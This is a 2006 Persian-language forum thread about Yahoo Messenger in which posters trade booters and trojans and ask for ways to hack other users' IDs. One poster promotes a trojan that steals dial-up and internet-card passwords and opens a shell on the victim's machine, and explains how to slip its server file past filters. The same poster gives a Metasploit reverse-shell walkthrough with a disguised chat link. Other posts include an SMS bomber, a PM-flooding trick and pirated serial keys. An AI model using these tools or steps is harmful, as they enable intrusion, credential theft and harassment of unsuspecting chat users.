این نرم افزار توسط شیوه های خاص و ترفندهایی بسیار جالب امکاناتی از قبیل:

- مدیریت IM ها
- امکان جلوگیری از بوت شدن
- بستن راه MailBomber ها
- جلوگیری از ارسال E-Mail های مشکوک
- کنترل Voice در چت روم ها
- جلوگیری از انجام فرمانهای یاهو مثلinvite P30RooT/ که برای بیرون انداختن افراد مزاحم از چت روم ها استفاده می شود !
- و ...

بسیاری از کاربران حرفه ای و مبتدی از این نرم افزار استفاده می کنند و به خاطر استفاده و طرز کار ساده آن، استفاده از آن را توصیه می کنیم.

دانلود - 622 کلیوبایت
serial: r7sc8-q13smf-gs9qs2-wugsye-k3x4ss

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ][-----------.com].zip

koochooloo
05-04-2006, 06:34
لطفا يه برنامه بديد كه پسورد طرف رو هك كنم.
inam 2 ta barname vase ---- yani 2 no terojan khob va aly
mamnon az dostane gholam

piishii
05-04-2006, 09:46
اين ارور رو ميده خواهشا رسيدگي كنيد :

خطای404: " صفحه مورد نظر شما در حال حاضر موجود نمیباشد

j0l6
05-04-2006, 14:18
کوچولو اون تروجان دومی به برنامه ی قبلی که گزاشتی (magic login)متصل شده بود میشه بگی tak_ps اونجا چیکار داشت؟؟

omid.com
05-04-2006, 16:35
سلام به تمامي دوستان عزيز يه مدت نبودم .اشكان جان اون دوتايي كه آپلود كردي رو امتحان كن هيچكدوم دانلود نميشه .يه زحمت بكش اصلاحش كن چون خيلي دونبال اون هارد بوت ميكشتم با تشكر اميد

j0l6
05-04-2006, 16:55
با اجازه ی دوستان من لینک این بوتر رو میزارم که کرک شده هستش ولی به صورت exe هستش و نصب میشه بعد کرکش کار میکنه همون طور که قبلا هم گفتم انتی موقع نصب اونو تروجا تشخیص میده ولی تحقیق کردم و فهمیدم که تروجان نیست
حالا اگه خواستین تست کنین من که تا حالا مشکلی باهاش نداشتم انتی رو هم فعال کردم و دیگه گیر نمیده
ولی همچی قوی هم نیستش
راستی اخرین ورژن رو هم اگه میدونین بگین

arash_irani
05-04-2006, 23:23
اين ارور رو ميده خواهشا رسيدگي كنيد :

خطای404: " صفحه مورد نظر شما در حال حاضر موجود نمیباشد
سلام دوست من
اين لينك رو امتحان كنيد حتما جواب ميده

البته یادتون باشه این لینک رو کپی کنید و در دانلود منیجرتون بزارید مثلا ( IDM )
موفق باشید
یا حق

j0l6
05-04-2006, 23:45
سلام
این رو مسنجر 7.5 هم جواب میده؟؟ چون من یه ورژنش رو داون کردم با مسنجر جدید مشکل داشت

MaFia
06-04-2006, 00:20
ادغام شد تاپيك

Mahdi Hero
06-04-2006, 16:29
Mr Ashkan Very Good

j0l6
06-04-2006, 17:07
سلام
دوستانی که دنبال سریال واسه یاهو تونل بودن اینو تست کنن فک کنم جواب بده من یه بار امحان کردم کار میکرد البته دو هفته قبل
jnet5-ent933-cfby5r-6u2a34-72rf6k

saeid_saeid
06-04-2006, 17:46
این یه ایکون چنجر
و یه سرس ایکون توپ
خوراک تروجان

atolympic
07-04-2006, 09:38
dost aziz ba in barname yaho crack mishe bad 100ta safe yaho ba zkon 100ta id login kon
اقا ممنون..
من اینو داشتم.......
یه برنامه ای با یه مسنجر بشه این کارو کرد نه با باز کردن چند تا مسنجر.......

*NashenaS*
07-04-2006, 15:54
.اشكان جان اون دوتايي كه آپلود كردي رو امتحان كن هيچكدوم دانلود نميشه .يه زحمت بكش اصلاحش كن چون خيلي دونبال اون هارد بوت ميكشتم با تشكر اميد
اميد عزيز ...
لينك ها رو تست كردم هر دوشون كار مي كنن:
نحوه دانلود رو گزاشتم كه ببينين:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

Mr Ashkan Very Good
I'm Glad U Like iT.

ادغام شد تاپيك
با كدوم تاپيك ادغام شد؟ :blush: نگرفتم...

سعيد از عكس تو امضات خوشم مياد ;) .

signal2006
07-04-2006, 22:40
من يه برنامه براي هك ايدي ميخواهم مرسي

saeid_saeid
07-04-2006, 23:17
سعيد از عكس تو امضات خوشم مياد ;) .

قابل شمارو نداره. اگه بخواي ميدم به شما[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

من يه برنامه براي هك ايدي ميخواهم مرسي

اگه تو اين تاپيكو يه كم بگردي مي‌توني پيداكني[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

signal2006
08-04-2006, 09:57
اقا اشکان من همه اینها رو گشتم اما چند تایی رو که دانلود کردم کار نمیکردن اگه میشه یه سالمشو بزارین مرسی

saeid_saeid
08-04-2006, 10:48
سيگنال جون چه جور چيزي مد نظرته؟

*NashenaS*
08-04-2006, 13:21
اقا اشکان من همه اینها رو گشتم اما چند تایی رو که دانلود کردم کار نمیکردن اگه میشه یه سالمشو بزارین مرسی
كدوم هارو منظورته كه كار نمي كردن بوتر ها؟
چه نوع error به شما مي ده... فايل كم داره؟

*NashenaS*
08-04-2006, 16:52
‍‍نسخه جديد برنامه ي iRcHaTaN Ps كه مانند نسخه قبلي در ياهو 7 كار ميكنيد البته با قابليت هاي جديد مثل ارسال (user,pass,number) كارت اينترنتي | dial up password ‍‍‍‍ و گرفتن شل( دسترسي كامل به كام‍يوتر قرباني)

در اين نسخه از برنامه قابليت ارسال password كارت هاي اينترنتي افزوده شده و هم چنين شما در اين نسخه ميتوانيد از قرباني شل بگيريد و كنترل كامل سيستم قرباني را به عهده بگيريد و هم چنين قابليت ارسال email با سيستم injection افزوده شده كه مي تواند از فايروال نيز عبور كرده و ايميل ارسال كند .pm ارسالي در اين نسخه توسط قرباني قابل رويت نيست و شما مي توتانيد از 2 mode ايميل و pm هم زمان استفاده كنيد .حتي اگر قرباني ياهو مسنجر نداشته باشد password كارت اينترت او براي شما ارسال مي شود و هم چنين مي توانيد از وي شل بگيريد. ديگر امكانات برنامه در عكس برنامه قابل رويت مي باشد و ما بقي در help برنامه موجود است.

براي دريافت iRcHaTaN Ps 7.1 اينجا كليك كنيد
([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

*NashenaS*
08-04-2006, 17:55
هک از طریق چت بدون ازسال فایل

در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد

Metasploit framework

توجه : اگر قبلآ نسخه Metasploit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن بزنید set PAYLOAD win32_reverse و بعد ان

بزنید set [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 217.216.30.40 و بعد آن

بزنید set LHOST 217.216.30.40

و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید . برای ارسال و گرفتن فایل هم می توانید به مقاله ی آموزشی که در سایت قرار داده شده رجوع کنید -

چون قربانی ممکن است به لینک شما شک کند و چون اینک ip شما است روی ان کلیک نکند .شما می توانید یک صفحه ی html از یک سایت به طور مثال یک صفحه از یک سایت .گالری عکس . جک و ... را save کنید و آن را با note pad باز کرده و کد زیر را در چند خط قبل انتهای آن past کنید.

*NashenaS*
08-04-2006, 18:44
نسخه جدید V 2.0 . iRcHaTaN Sms BOmber که مانند نسحه ی فبلی قابلیت ارسال sms به تعداد زیاد به طور مجانی را دارد . تنها کافی است که شماره موبایل قربانی را وارد کرده bomb را بزنید تا به تعداد مشخص شده توسط شما برایش sms بفرستد. متن این sms ها مانند نسخه ی قبلی عدد بوده و قابل تغیر نیست و برای مدت محدودی کارایی دارد .ممکن است sms ها با یک فاصله زمانی کم یک جا ارسال شوند

موفق باشيد. :) (نه در خراب كردن موبايل مردم... در زندگي تون :laughing: )

papiyoon
08-04-2006, 18:53
نسخه جدید V 2.0 . iRcHaTaN Sms BOmber که مانند نسحه ی فبلی قابلیت ارسال sms به تعداد زیاد به طور مجانی را دارد . تنها کافی است که شماره موبایل قربانی را وارد کرده bomb را بزنید تا به تعداد مشخص شده توسط شما برایش sms بفرستد. متن این sms ها مانند نسخه ی قبلی عدد بوده و قابل تغیر نیست و برای مدت محدودی کارایی دارد .ممکن است sms ها با یک فاصله زمانی کم یک جا ارسال شوند

موفق باشيد. :) (نه در خراب كردن موبايل مردم... در زندگي تون :laughing: )
من امتحان کردم کار نکرد
کسی از این برنامه نتیجه گرفته ؟

*NashenaS*
08-04-2006, 18:57
من امتحان کردم کار نکرد
کسی از این برنامه نتیجه گرفته ؟
رو كدوم بد بخت امتحان كردي؟ :laughing: :blink:

j0l6
08-04-2006, 19:08
من هم رو خودم امتحان کردم کار نکرد البته ایران نیستم نمیدونم این محدودیت رو داره یا نه
دوستان راهی سراغ دارین که بشه تشخیص داد لینکی که واست pm دادن ویروسی هستشیا به فایل سرور متصل شده؟؟
قبلا با نگاه کردن به لینک و دیدن ای پی جای اسم سایت میشد حدس زد ولی یه جا خوندم که میشه اینو هم دور زد یعنی کاری کرد که ای پی نشون نده بلکه ادرس یه سایت باشه

papiyoon
08-04-2006, 19:12
رو كدوم بد بخت امتحان كردي؟ :laughing: :blink:
روی شماره خودم امتحان کردم دریغ از 1 دونه sms :laughing: :laughing:

signal2006
08-04-2006, 19:16
اقا اشکان مثلا این irchatan-ps 7.1 را كه گذاشتي همه كاراشو ميكنم اين پيغام رو ميده server created successfully اگه ميشه بگين چكار كنم مرسي

*NashenaS*
08-04-2006, 19:26
روی شماره خودم امتحان کردم دریغ از 1 دونه sms
عجب دل و جراتي بابا :laughing:

اقا اشکان مثلا این irchatan-ps 7.1 را كه گذاشتي همه كاراشو ميكنم اين پيغام رو ميده server created successfully اگه ميشه بگين چكار كنم مرسي
خوب شما الان سرور رو با موفقيت ساختي ...
حالا يه فايل ديگه به اون فايل هايي كه توي فولدر داشتي اضافه شده...
روي اون به هيچ وجه نبايد كليك كنين چون خودتون هك مي شين (البته به وسيله خودت)..
از help خيلي كمك ها مي توني بگيري..
حالا اون فايل رو به روش هاي مختلف مي توني براي طرف بفرستي...
و فلك زده رو هك كني... :evil:

aliarc2003
08-04-2006, 20:37
عجب دل و جراتي بابا :laughing:

با سرويس هاي ياهو و گوگل و.... كه فايل سرور رو نمي شه فرستاد؟
اگه يكي از اين روش ها رو بگي ممنون مي شم.

مرسي

aliarc2003
08-04-2006, 20:38

مرسي

*NashenaS*
08-04-2006, 22:40

مرسي
سلام دوست من...
نه با ياهو يا گوگل در حالت عادي نمي شه!
اما اگه شما اون رو به حالت فشرده (.rar يا .zip) در بياري ديگه مشكلي پيش نمياد...

يه عالمه سايت (مجاني) ديگه هم هست كه بتوني روش فايل اپلود كني...
موفق باشي :)

aliarc2003
09-04-2006, 08:12
ممنون از جوابتون :)
اصلا به فكر آپلود اون نبودم ...

saeid_saeid
09-04-2006, 09:43
آخه اين IRchatan ps كه كار نميكنه. من رو كامپيوتر خودم امتحان كردم جواب نداد.

saeid_saeid
09-04-2006, 09:45
هک از طریق چت بدون ازسال فایل

در متدی جدید که ....
اشكان جون تونستي با اين كار كني. من امتحان كردم . اينم جواب نداد.

*NashenaS*
09-04-2006, 13:24
آخه اين IRchatan ps كه كار نميكنه. من رو كامپيوتر خودم امتحان كردم جواب نداد.
شماها يا زده به سرتون يا كامپيوتر زيادي دارين. :laughing:
تا اونجا كي مي دونم روي 7 كار مي كنه... 7.5 رو نمي دونم.

اشكان جون تونستي با اين كار كني. من امتحان كردم . اينم جواب نداد.
دارم روش كار مي كنم... ظاهرا باهاله. :)

omid.com
09-04-2006, 22:48
با سلام خدمت دوستان اينا سريالهاي فعال سازي ياهو تونل براي ورزنهاي مختلفش امتحان كنيد انشالا جواب ميده
v230=jkmndk-mnbmaf-dy2xuu-8mtxte-udn5f
v232=ax4ba-x2kmmm-reckb3-k2mtx5-88nsaa
v234=m7sc8-q13smf-gs9qs2-wigsye-k3x4ss
v236=gww56-2axfbd-qe7s4j-8u5vgs-msj5xm
v240m7sc8-z13smf-gs9qs2-wugsye-k3x4ss
v252=ed5ta-67u4ju-tu3x9e-33bydc-n5fbrd
v264=daikx-7s645n-d264nx-dudneb-tyeyj5
v272=daikx-7s645n-d264nx-dudneb-tyeyj5
v330=eklg5-yay5va-6j2n2w-mx5j0m-qb8fyg
v334=ej4t2-k8dd9r-uer934-jt3k7b-asbbfx
v336=t54dc-42fm82-fm4d8k-ac572k-2f8nxd
v338 and344=r46x3-axxy64-2bcbde-a4cd4a-3ryyb80rs
v350 and 352=ek5fx-kxxt74-encd99-t556n2-62dr2r
v360 and 364=afyc8-fkc5c9-b34rb2-djtr4s-funbs3
v368=n6ege-sc48ex-679d3v-cja9ds-mwtdet
v372=a2des-7sj8ak-ba97b7-j66f9s-6rfc5n
v374=jnet5-ent933-cfby5r-6u2a34-72rf6k
موفق باشيد و در پناه خدا . اميد

radepa
10-04-2006, 00:19
يكشنبه ۲۰ فروردين ۱۳۸۵
جدیدترین بوترهای یاهو

BitchSlap
PurgatorisSuffering
CuRReNCY_by_Se7eN
LamerBlaster
Yah3ll-Assassin v1
YaRage2
WickedEliteV4
Yahoo_Deranged_Boot V1

*NashenaS*
10-04-2006, 00:40
اميد عزيز و رد پاي خوب...
ممنون از لطفتون... :)

------=============------

Chat without SPAM
(no banners, no advertisements, no nags, no spyware)
The current YahELite version is Build 300
Screen Snapshot for YahELite 300 on XP (scheduled for Apr 2006)

YahELite protects you
from 'boot codes', 'text floods', 'unwanted PMs', 'sound bombs', 'spam' and other mischief.

It runs on your PC
This unofficial, free, efficient and comfortable anti-SPAM chat client runs on windows 95 to XP and Linux WINE.

Use it at home
Download FULL YahELite (recommended) Includes the install/uninstall.

Contains chat, voice, smiley fonts, emotions.dat, valleygirl personality and more.
After saving this program to your desktop or running it from the download location, start it, follow the install instructions and it will create a program folder named 'YahELite' and install the files.

Travelling? Take your YahELite with you!
Read how to use your thumb drive or even your USB capable digital camera! as a travelling YahELite drive..
It is easy and it keeps your personal information private.
Away from home?
At a library or public terminal you can Open -or- Run minimal YahELite

براي كسايي كه نمي خان بوت شن اين برنامه به درد مي خوره...
براي اين منظور (بوت نشدن) چت كلاينت هاي زيادي ساخته شدن كه لينكشون رو مي دم:

--------===========-----------

اين هم يه بوتر كه ظاهرا كارش جالبه:دانلود:

*NashenaS*
10-04-2006, 01:07
برنامه اي كه بشه همزمان با جند id چت كرد:

اخرين ورژن هستش حجم خيلي كم
Multi Y! Messenger 7.5.0.333 - 19kb

با تشكر از فريد عزيز.

Behroooz
10-04-2006, 17:47
لطفا جواب بدين

K053_LSH_KV90
10-04-2006, 18:54
اشكان جان اون برنامه نيست يه فايلي كه ياهو رو پچ ميكنه يه تغيرات كوچيكي توش ايجاد مي كنه تا با چند تا آيدي لوگين كني

*NashenaS*
10-04-2006, 19:00
اشكان جان اون برنامه نيست يه فايلي كه ياهو رو پچ ميكنه يه تغيرات كوچيكي توش ايجاد مي كنه تا با چند تا آيدي لوگين كني
سلام...
من شرمنده منظورت رو نفهميدم... سوال كردي يا نظرتو گفتي؟
من اين برنامه اي كه توي 2 پست قبل گزاشتم بايد همين كاري كه گفتي و انجام بده...
من باز سوالي بود در خدمتم.
ممنون. :)

radepa
10-04-2006, 23:30
برنامه اي كه بشه همزمان با جند id چت كرد:

اخرين ورژن هستش حجم خيلي كم
Multi Y! Messenger 7.5.0.333 - 19kb

با تشكر از فريد عزيز.

سلام آقا اشكان فكر كنم همينجا يا يك جاي ديگر بود كه مي گفت اين نرم افزارها خودشون براي بوت و هك است درسنه اگه درسته نذار يا امتحان كن بگو اين نرم افزار اينجوري نيست پيشاپيش ممنون

*NashenaS*
10-04-2006, 23:53
سلام آقا اشكان فكر كنم همينجا يا يك جاي ديگر بود كه مي گفت اين نرم افزارها خودشون براي بوت و هك است درسنه اگه درسته نذار يا امتحان كن بگو اين نرم افزار اينجوري نيست پيشاپيش ممنون
دوست من سلام...
عرضم به حضور گلت كه در تاپيكي كه دوستي درخواست كرده بود كه يه نرم افزاري خواسته بود كه با اون بشه همزمان با چند ايدي چت كرد و دوست عزيزم فريد اينطور جواب دادن:

اگر برداشت من غلط بوده لطفا تصحيح كن...

radepa
11-04-2006, 01:03
خوب یک بوتر عالی که با ۶ تا آیدی لوگین میشه و دارای ۳ تا آپشن هست ... یکی برای بوت کردن دیگری

برای اینکه تست کنی فرد مورد نظر آنلاین هست یا نه و آخریش هم روم بوتر جالب این برنامه هست ...

دانلود 55.3 کیلو بایت
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]).zip

radepa
11-04-2006, 01:05
بي خيال خودم از همونها گذاشتم

Mani_Borna
11-04-2006, 04:41
بهروز جان از چه نظر؟
ياهو مسنجر اصلا قابل مقايسه با گوگل تاك نيست.

Behroooz
11-04-2006, 08:21
از لحاظ add کردن کاربرها و حرف زدن با هم

Mani_Borna
12-04-2006, 03:40
بهروز جان فقط آنلاين ميتوني آفلاين نميشه مثل ياهو.در ضمن خيلي از امكانات ياهو هم نداره.تازه مثل نسخه هاي اوليه ياهو مسنجره با اين تفاوت كه اون از همون اول آفلاين هم ميشد.

MaFia
12-04-2006, 05:24
ولی یه چیز جالب گوگل نسبت به یاهو شفافیت صدا هست
اصلا صدا در گوگل تغیر نمی کنه
ولی صدا در تلفن و یاهو تغیراتی داره
برای کسانی که دقیق باشند خیلی واضح و باور نکردنی هست
من روز اول شوک شدم

pandemonium
13-04-2006, 22:17
لطفا زودتر جواب بدين :

من با دوستم تو ياهو مسنجر وقتي ميخوايم فايلي رو براي هم ارسال كنيم خيلي وقتها وسط راه يا همون اويل پيغام خطا ميده و عمليات انتقال فايل متوقف ميشه .
هر دو مون از آخرين ورژن ياهو مسنجر استفاده ميكنيم و آپديت هستيم .

مشكل از چيه ؟

عجيب بودنش اينه كه بعضي فايلها ارسال ميشه و بعضي ها رو خطا ميده .اصلا هم ربطي به حجم فايلها نداره .
مثلا يه فايل 6 مگي رو بدون اشكال ارسال كرد ولي در ارسال يك فايل چند صد كيلويي موفق نبود .
و اينكه در روزهاي ديگه و زمانهاي متفاوت از شبانه روز هم باز همين طوره و اون فايلهايي كه نميتونه ارسال كنه دقيقا همون ها رو در هيچ موقعي نميتونه ارسال كنه .
فايل ها هم هيچ مشكلي ندارند و خراب و نيستند .

قضيه چيه ؟
راه حل چي پيشنهاد ميكنين ؟؟

اين برام خيلي مهمه .

کاپتان هادی
14-04-2006, 00:53
لطفا زودتر جواب بدين :

من با دوستم تو ياهو مسنجر وقتي ميخوايم فايلي رو براي هم ارسال كنيم خيلي وقتها وسط راه يا همون اويل پيغام خطا ميده و عمليات انتقال فايل متوقف ميشه .
هر دو مون از آخرين ورژن ياهو مسنجر استفاده ميكنيم و آپديت هستيم .

مشكل از چيه ؟

عجيب بودنش اينه كه بعضي فايلها ارسال ميشه و بعضي ها رو خطا ميده .اصلا هم ربطي به حجم فايلها نداره .
مثلا يه فايل 6 مگي رو بدون اشكال ارسال كرد ولي در ارسال يك فايل چند صد كيلويي موفق نبود .
و اينكه در روزهاي ديگه و زمانهاي متفاوت از شبانه روز هم باز همين طوره و اون فايلهايي كه نميتونه ارسال كنه دقيقا همون ها رو در هيچ موقعي نميتونه ارسال كنه .
فايل ها هم هيچ مشكلي ندارند و خراب و نيستند .

قضيه چيه ؟
راه حل چي پيشنهاد ميكنين ؟؟

اين برام خيلي مهمه .
سلام اين مشكل اغلب اوقات به نوع فايل شما برمي گرده و بيشتر براي مسائل امنيتي فايلهاي اجرائي رو ارسال نمي كنه شما بهتره بجاي فرستادن از طريف ياهو كه خيلي هم دردسر داره فايلرو برايه دوستتون يا ميل كنيد يا براش اپلود كنيد جائي

hamidma
14-04-2006, 15:06
خوب لطف می کنید و این شیوه رو بهتر توضیح بدید. من در این دو کلیدی که شما گفتید این عبارتsvchost رو ندارم ولی در کلیدهای دیگری وجود داره که البته فکر کنم از فایلهای اصلی ویندوز باشه و با این svchost متفاوت باشه.
منتظر راهنمایی شما هستم.
مشکل من :

pandemonium
15-04-2006, 21:43
سلام اين مشكل اغلب اوقات به نوع فايل شما برمي گرده و بيشتر براي مسائل امنيتي فايلهاي اجرائي رو ارسال نمي كنه شما بهتره بجاي فرستادن از طريف ياهو كه خيلي هم دردسر داره فايلرو برايه دوستتون يا ميل كنيد يا براش اپلود كنيد جائي

سلام .اتفاقا فايلهايي كه من ميفرستم همگي يا آهنگ بودند يا عكس .
پس مشكل بخاطر اين نيست .

واسه شما ها هم همچين مشكلي بوجود اومده ؟؟
كسي چيزي به ذهنش نميرسه ؟

*NashenaS*
15-04-2006, 23:06
پیدا کردن ایپی در چت یه خورده دردسر داره... اما توضیح می دم امیدوارم که متوجه بشین.

برای این کار از دستور Netstat استفاده می کنیم... شما راه زیر رو دنبال کنین:

Start / Run /... و دستور cmd رو در اون تایپ می کنی و Enter رو می زنی.

صفحه سیاهی میاد که در اون شما می تونین تایپ کنی... حلا شما به دستور netstat -n نیاز داری.

وقتی که شما این دستور رو تایپ کرده و Enter رو می زنی. صفحه ای به این صورت جلوی شما میاد.

به طور خلاصه.... شما با ستون Foreign Address کار دارین... IP هایی که فکر می بینین به همراه Port نمایش داده میشن... مثلا اینجا که به قرمز نشون دادم 38.115.131.131 ای پی و 2240 پرت مربوطه هست. شما خود به خود با توجه برنامه هایی که به اینترنت وصل می شن از این ایپی ها خاهید داشت.. پس بهتره همش و ببندید و فقط پی ام تون با طرف باز باشه که راحت تر بتونین این کارو انجام بدین. خوب حالا این ایپی که به دست می ارین رو تست می کنین و می بینین که کدومش مال طرفه:

سایت تست کردن هم: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
or

کلی سایت برای این کار هست.. این فقط نمونشه.

*NashenaS*
15-04-2006, 23:10
خوب لطف می کنید و این شیوه رو بهتر توضیح بدید. من در این دو کلیدی که شما گفتید این عبارتsvchost رو ندارم ولی در کلیدهای دیگری وجود داره که البته فکر کنم از فایلهای اصلی ویندوز باشه و با این svchost متفاوت باشه.
منتظر راهنمایی شما هستم.
مشکل من :
براي مشكل شما احتمالا از اين كي لاگر هاي جديده...
پس در رجيستري هم جاش و نمي زاره...
شما يه اسكن از كل سيستم بكن (با كسپر)
يه فايروال خوب نصب كن (اوت پست)
يه تروجان ريموور بگير و كامپيوترت رو سكن كن...
فعلا اينا به ذهنم مي رسه... :)

Mitamo
15-04-2006, 23:14
من هم همین مشکل رو دارم. اگر کسی جوابش رو داشت بگه....

*NashenaS*
15-04-2006, 23:19
سلام ...
يه سري بوتر جديد اوردم..

Description: Clean - 2 bot login, 6 options
Date Added: 7:29 PM 1/28/06
Last Download: 3:44 PM 4/15/06
Rating: 0/10 (0 votes)

!Smack-A-Hoe!
Description: Clean - 100 Bot login, 18 Boot options, MIc Locker, Account locker,
Creator: BoOgIeMaN
Date Added: 7:41 PM 2/23/06
Last Download: 3:45 PM 4/15/06

!Smack-A-Hoe-v3!
Description: Clean - Multi, 9 options, mic locker, account locker, auto boot pm, multi victim boot, mini chat, room options with voice, roomlist grabber, spammer, smileys, mp3 player, tools and shoutboard
Date Added: 5:11 PM 3/17/06
Last Download: 3:23 PM 4/15/06

1_Bot_Kill_2.0
Description: Clean - 1 Bot Login 8 Main Boot Options: 7.0 D/C, 6.0 DC, Y!Tunnel D/C, 1 Bot Bomb, Y!Pager, Auto Boot, File DC, All At Once.. Includes Auto Bot Refresh, Saves ID & Password For Next Time! Auto Bot Switch Lets You Put Alot Of Bots In To Auto Switch Them Selfs After Every Boot! Has Room Boot, Boot List, Voice TALK! Mini Chat Client!
Date Added: 3:35 PM 3/5/06
Last Download: 3:47 PM 4/15/06

فعلا بسه :tongue:

*NashenaS*
15-04-2006, 23:21
BOOT TUTORIAL

ديگه از اسمش پيداست ديگه...
يادتون مي ده چطوري بوت كنين...
ديگه سوال نكنيناااا!! :tongue:

Description: BOOT TUTORIAL --> READ THIS BEFORE YOU ASK QUESTIONS OR EMAIL ME!!
Creator: p00fy
Date Added: 10:13 AM 4/13/06
Last Download: 3:08 PM 4/15/06

Hamid110
15-04-2006, 23:33
سلام

من چند بار توي روم بودم و ديدم يكي در عرض چند ثانيه 100 ها pm پشت سر هم و در يك پنجره جديد برام فرستاده

ميشه كسي از دوستان اسم نرم افزار يا خود نرم افزارش رو اگه ميدونه بده

ممنون

*NashenaS*
15-04-2006, 23:36
سلام

من چند بار توي روم بودم و ديدم يكي در عرض چند ثانيه 100 ها pm پشت سر هم و در يك پنجره جديد برام فرستاده

ميشه كسي از دوستان اسم نرم افزار يا خود نرم افزارش رو اگه ميدونه بده

ممنون
سلام حميد عزيزم...
اون ها مي تونه هر كدوم از اين بوتر هايي كه مي زارم باشه...
در اين ها يك قسمتي وجود داره كه مثلا بهش مي گي 10000 تا پي ام براي فلان اي دي بفرست...
بعد مي شه اون بلايي كه سر شما اومد...
:tongue:

Tornado2800
15-04-2006, 23:42
جوابش این هستش که
دو سیستم باید بتونند به فایل Yserver یاهو مسنجر همدیگه وصل بشند در نتیجه نمی تونند به یکدیگر وصل بشند و پیغام رو می ده ;)

*NashenaS*
15-04-2006, 23:42
Yahoo Chat Commands

Your /help command is the most important one it will usually pull up a list of commands available to you, but not all chat clients offer a list of commands. And some chat clients have special commands not listed here. Play around and see what you come up with

*NashenaS*
15-04-2006, 23:47
Boot without a booter :blink: :laughing:

جالبه نه؟ بوت بدون بوتر...
در ياهو 7 به بالا...
يه پي ام به كسي كه مي خاين بوتش كنين بدين...
بعد در همون جايي كه چيز مي نويسين و enter مي زنين...
CTRL+SHIFT+R رو 2 بار بزنين: 2 تا پي ام براي طرف مي ره...
حالا خودتو حدس بزنين ديگه 100 بار بزنين طرف گير مي كنه... :evil: :laughing:

*NashenaS*
15-04-2006, 23:49
How to change your IP in 30 seconds?!! :blink:

اين ديگه خداست...
اي پي خوتون رو در 30 ثانيه تغيير بدين...

The following is a guide on how to change your IP in 30 seconds or less. This can be used if your IP has been banned from a game server, or on gunbound if your IP get's blocked. I've tried this on both Windows XP and Windows 2000, and it has worked:

1. Click on Start in the bottom left hand corner of screen
2. Click on Run
3. Type in command and hit okay

You should now be at an MSDOS prompt screen.

4. Type ipconfig /release just like that, and hit enter
5. Type exit and leave the prompt
6. Right-click on Network Places or My Network Places on your desktop.
7. Click on properties

You should now be on a screen with something titled Local Area Connection, or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on Local Area Connection and click properties
9. Double-click on the Internet Protocol (TCP/IP) from the list under the General tab
10. Click on Use the following IP address under the General tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press Tab and it should automatically fill in the Subnet Mask section with default numbers.
13. Hit the okay button here
14. Hit the okay button again

You should now be back to the Local Area Connection screen.

15. Right-click back on Local Area Connection and go to properties again.
16. Go back to the TCP/IP settings
17. This time, select Obtain an IP address automatically
18. Hit okay
19. Hit okay again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

*Note* This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Hamid110
16-04-2006, 00:01
Boot without a booter :blink: :laughing:

جالبه نه؟ بوت بدون بوتر...
در ياهو 7 به بالا...
يه پي ام به كسي كه مي خاين بوتش كنين بدين...
بعد در همون جايي كه چيز مي نويسين و enter مي زنين...
CTRL+SHIFT+R رو 2 بار بزنين: 2 تا پي ام براي طرف مي ره...
حالا خودتو حدس بزنين ديگه 100 بار بزنين طرف گير مي كنه... :evil: :laughing:

سلام

بابا دمت گرم

حال كردم

تو ديگه كي هستي

اين روش خيلي با حاله

ممنون از آموزشت

موفق باشي

Mitamo
16-04-2006, 15:18
جوابش این هستش که
دو سیستم باید بتونند به فایل Yserver یاهو مسنجر همدیگه وصل بشند در نتیجه نمی تونند به یکدیگر وصل بشند و پیغام رو می ده ;)

من درست نفهمیدم یه کم واضح تر میگی :blush:
و اینکه راه خلاصی از این مشکل چیه؟

nimo
16-04-2006, 18:48
خیلی باحال بود

Behroooz
17-04-2006, 10:58
man ba email file ferstadam choon ba yahoo nashod

br0991
17-04-2006, 18:59
